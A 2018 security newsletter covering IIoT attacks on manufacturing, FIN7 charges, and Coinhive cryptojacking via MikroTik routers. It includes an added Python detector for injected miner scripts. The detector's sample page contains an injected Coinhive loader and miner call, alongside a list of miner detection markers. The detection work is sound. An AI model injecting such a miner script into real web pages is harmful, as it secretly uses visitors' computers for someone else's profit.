Insight Weekly Security News Letter-10-Aug-2018

Industrial IoT Enables Attacks in Manufacturing Industries

The proliferation of industrial internet of things (IIoT) devices is reportedly at the root of the higher than normal rates of reconnaissance related to cyber-attacks and lateral movement activity in the manufacturing industry.

The new 2018 Spotlight Report on Manufacturing analyzed attacker behaviors and network trends from more than 250 manufacturing enterprises. For six months, the researchers monitored network traffic, collecting metadata from customer cloud, data center and enterprise environments.

Analysis of the metadata garnered from over 4 million devices and workloads revealed the ways in which the manufacturing industry is a prime target for attack.

Attackers who are able to bypass perimeter security gain network access, where they collect intel on their victims. The research revealed an unusually high volume of reconnaissance behavior, suggesting that attackers are mapping out manufacturing networks to locate critical assets.

Because the networks often have insufficient internal access controls, criminals are able to steal sensitive information with relative ease, the report found. Once attackers infiltrate the network, they spread the attack inside it, as evidenced by the finding that there is an abnormally high level of lateral movement.

Given that security controls can interrupt and isolate manufacturing systems, many manufacturers fail to invest in them. Instead, factories connect IIoT devices to flat, unpartitioned networks that have to communicate with general computing devices and enterprise applications, according to the report.

In the past, manufacturers relied on more customized, proprietary protocols, which made mounting an attack more difficult for cybercriminals. “The conversion from proprietary protocols to standard protocols makes it easier to infiltrate networks to spy, spread and steal,” the report stated.

The effort to automate real-time data collection across integrated digital systems, IIoT devices and cloud computing resources in the manufacturing supply chain is known as Industry 4.0. Using IIoT devices to converge enterprise information technology with operational technology networks in manufacturing organizations has enabled not only intellectual property theft but also business disruption.

The interconnectedness of Industry 4.0-driven operations, such as those that involve industrial control systems, along with the escalating deployment of IIoT devices, has created a massive attack surface for cybercriminals to exploit.

Reference:

https://www.infosecurity-magazine.com/news/iiot-enables-attacks-in/

FIN7 Hackers Charged With Stealing 15 Million Credit Cards

Three members of one of the world’s largest cybercrime organizations, which stole over a billion euros from banks across the world over the last five years, have been charged.

The suspects are members of FIN7, the hacker group behind the Carbanak and Cobalt malware, and were arrested last year in Europe between January and June.

First uncovered by Russian cybersecurity firm Kaspersky Labs in 2014, FIN7 started its activities almost five years ago by launching a series of malware attacks using Anunak and Carbanak to compromise banks and ATM networks worldwide, from which they swiped millions of credit card details from US-based retailers.

How it works?

To compromise bank networks, FIN7 sent malicious spear-phishing emails to hundreds of employees at different banks, which infected computers with Carbanak malware if opened, allowing attackers to transfer money from the banks to fake accounts or ATMs monitored by them.

Hackers Attack Over 200,000 MikroTik Routers and Infect Them with Mass Coinhive Cryptojacking Malware

Security researchers have discovered at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them.

Impact:

The security flaw can potentially allow an attacker to gain unauthenticated, remote administrative access to any vulnerable MikroTik router.

The first campaign, noticed by Trustwave researchers, began with targeting networking devices in Brazil, where a hacker or a group of hackers compromised more than 183,700 MikroTik routers.

Since other hackers have also started exploiting the MikroTik router vulnerability, the campaign is spreading on a global scale.

How it works?

The attackers are injecting Coinhive’s JavaScript into every web page that a user visits using a vulnerable router, eventually forcing every connected computer to unknowingly mine Monero cryptocurrency for the miscreants.
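One way to check a network path for this kind of injection, as an added example that is not from the newsletter or the cited researchers: compare the `<script>` elements of the same page fetched over a trusted path and through the suspect router, and flag any extra script that carries Coinhive's loader or API names. The sample pages, the placeholder site key and the function names are constructed for illustration, and the check assumes the injected snippet is not obfuscated.

```python
from html.parser import HTMLParser

# Substrings of Coinhive's loader file and JavaScript API objects.
# Assumption: the injected snippet is not obfuscated or renamed.
MINER_MARKERS = ("coinhive.min.js", "coinhive.anonymous", "coinhive.user")

# Constructed sample pages: the same document fetched over a trusted path
# and through the suspect router. The site key is a placeholder.
REFERENCE_HTML = """<html><head><script src="/static/app.js"></script></head>
<body><h1>Intranet</h1></body></html>"""
OBSERVED_HTML = """<html><head><script src="/static/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');</script>
</head><body><h1>Intranet</h1></body></html>"""

class ScriptCollector(HTMLParser):
    """Collects every <script> element as [src, inline_body]."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append([dict(attrs).get("src") or "", ""])
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1][1] += data

def scripts_in(html):
    """Return the page's scripts as a set of (src, whitespace-normalised body)."""
    parser = ScriptCollector()
    parser.feed(html)
    return {(src.strip(), " ".join(body.split())) for src, body in parser.scripts}

def injected_scripts(reference_html, observed_html):
    """Scripts in the observed page that the known-good copy lacks."""
    findings = []
    for src, body in sorted(scripts_in(observed_html) - scripts_in(reference_html)):
        text = f"{src} {body}".lower()
        findings.append({"src": src, "inline": body,
                         "miner": any(m in text for m in MINER_MARKERS)})
    return findings
```

The comparison only makes sense for pages served over plain HTTP, since a router in the path cannot alter TLS-protected content without breaking certificate validation. Any extra script is worth a look even when `miner` is false, because it still means something between the server and the browser changed the page.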

Remediation:

A single patch provided by MikroTik, which has been available since April, is “enough to stop this exploitation in its tracks.”